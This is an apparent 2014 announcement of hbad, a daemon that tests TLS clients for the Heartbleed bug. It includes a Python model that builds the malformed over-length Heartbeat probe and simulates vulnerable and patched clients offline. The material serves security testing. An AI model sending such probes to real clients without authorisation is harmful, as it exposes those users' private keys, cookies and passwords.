Heartbleed analysis daemon published

Date: 2014-05-02 14:17:53

Preface

The Heartbleed bug (CVE-2014-0160) is a programming error in versions 1.0.1 through 1.0.1f of the open-source OpenSSL cryptography library: a missing bounds check in the handler for the TLS Heartbeat extension. It lets a peer read up to 64 KB of the other side's process memory per Heartbeat request, which can include private keys, session cookies, passwords and other plaintext that TLS was supposed to protect. Both servers and clients can be attacked this way. It was fixed in version 1.0.1g on April 7th, 2014.

Hbad functionality

The functionality of hbad can be demonstrated with the illustration below:

[Illustration: a client connects to the hbad server, hbad sends a Heartbeat request, and a vulnerable client answers with a Heartbeat response containing its memory]
When any client (e.g. an IRC client, Fetchmail, or a browser) connects to the hbad server, the client opens the TLS handshake and hbad inspects its ClientHello for the Heartbeat extension (RFC 6520). If the extension is offered, that is a strong indication that the client is built on OpenSSL, since few other TLS implementations support it. hbad then sends the client a Heartbeat request whose declared payload length is larger than the payload actually sent. A client running a vulnerable OpenSSL version does not compare the declared length with the record it received and answers with a Heartbeat response padded with up to 64 KB of its own process memory, which may contain sensitive data. A client with a fixed OpenSSL silently discards the malformed request, so no response is the expected result for a patched client. Because the response is a copy of the client's memory, hbad should only be pointed at clients you own or are authorised to test.
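The three steps described above, modelled in Python as an added example; this is not hbad's own code, and all function names (client_offers_heartbeat, build_heartbeat_request, simulate_client, classify_response) are assumptions of this example. The ClientHello, the probe, and the "heap" that the simulated client leaks are constructed inline so the exchange runs offline: the simulated client copies declared_len bytes from the received payload exactly as the unpatched handler did, while the patched variant applies the 1.0.1g length check and discards the request.

```python
import struct

# TLS constants (RFC 5246 / RFC 6520)
CT_HANDSHAKE, CT_HEARTBEAT = 0x16, 0x18
HEARTBEAT_EXT = 0x000F           # extension type "heartbeat"
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
PADDING = b"\x00" * 16           # RFC 6520 requires at least 16 bytes of padding


def tls_record(content_type, body):
    return bytes([content_type]) + b"\x03\x01" + struct.pack("!H", len(body)) + body


def build_client_hello(extensions):
    """Minimal constructed ClientHello record; extensions is a list of (type, data)."""
    ext_blob = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body = (b"\x03\x03" + b"\x11" * 32            # client_version, random (constructed)
            + b"\x00"                              # empty session_id
            + struct.pack("!H", 2) + b"\x00\x2f"   # one cipher suite
            + b"\x01\x00"                          # one compression method (null)
            + struct.pack("!H", len(ext_blob)) + ext_blob)
    return tls_record(CT_HANDSHAKE, b"\x01" + len(body).to_bytes(3, "big") + body)


def client_offers_heartbeat(record):
    """Step 1 (hbad's check): does the ClientHello carry the heartbeat extension?"""
    try:
        if record[0] != CT_HANDSHAKE:
            return False
        hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
        if hs[0] != 0x01:                          # not a ClientHello
            return False
        body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
        pos = 2 + 32                               # skip client_version and random
        pos += 1 + body[pos]                       # session_id
        pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + body[pos]                       # compression_methods
        if pos + 2 > len(body):
            return False                           # no extensions block at all
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            if etype == HEARTBEAT_EXT:
                return True
            pos += 4 + elen
        return False
    except (IndexError, struct.error):
        return False                               # truncated or malformed record


def build_heartbeat_request(payload, declared_len=None):
    """Step 2: a Heartbeat request; declared_len > len(payload) is the Heartbleed probe."""
    if declared_len is None:
        declared_len = len(payload)
    return tls_record(CT_HEARTBEAT, bytes([HB_REQUEST]) + struct.pack("!H", declared_len) + payload + PADDING)


def simulate_client(request, heap_after_record, vulnerable):
    """Model of the client's heartbeat handler; heap_after_record stands for whatever
    happens to follow the received record in the client's memory (constructed)."""
    rec_len = struct.unpack("!H", request[3:5])[0]
    msg = request[5:5 + rec_len]
    declared = struct.unpack("!H", msg[1:3])[0]
    if not vulnerable and 1 + 2 + declared + 16 > rec_len:
        return None                                # the 1.0.1g check: discard silently
    echoed = (msg[3:] + heap_after_record)[:declared]   # unpatched: memcpy(bp, pl, payload)
    return tls_record(CT_HEARTBEAT, bytes([HB_RESPONSE]) + struct.pack("!H", declared) + echoed + PADDING)


def classify_response(response, sent_payload):
    """Step 3: did the Heartbeat response carry more than we sent?"""
    if response is None:
        return "no-response", b""                  # patched client (or heartbeat disabled)
    rec_len = struct.unpack("!H", response[3:5])[0]
    msg = response[5:5 + rec_len]
    if response[0] != CT_HEARTBEAT or msg[0] != HB_RESPONSE:
        return "unexpected", b""
    echoed = msg[3:3 + struct.unpack("!H", msg[1:3])[0]]
    if echoed.startswith(sent_payload) and len(echoed) > len(sent_payload):
        return "vulnerable", echoed[len(sent_payload):]   # the over-read memory
    return "no-overread", b""


if __name__ == "__main__":
    hello = build_client_hello([(HEARTBEAT_EXT, b"\x01")])
    print("heartbeat offered:", client_offers_heartbeat(hello))
    probe = build_heartbeat_request(b"hbad", declared_len=64)
    heap = b"Cookie: session=SECRET" + b"\x00" * 100   # constructed client memory
    for vulnerable in (True, False):
        verdict, leaked = classify_response(simulate_client(probe, heap, vulnerable), b"hbad")
        print("vulnerable client" if vulnerable else "patched client", "->", verdict, leaked[:40])
```

The leaked bytes begin with the 16 padding bytes that followed the probe's payload, because the unpatched copy starts at the payload pointer and simply runs on; everything after that is whatever sat next to the record in the client's memory, which is why hbad's output must be treated as confidential.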

Download documentation and client tests:

hbad_en.pdf (English)

hbad_dt.pdf (German)

You can download hbad here:

hbad-release.tar.gz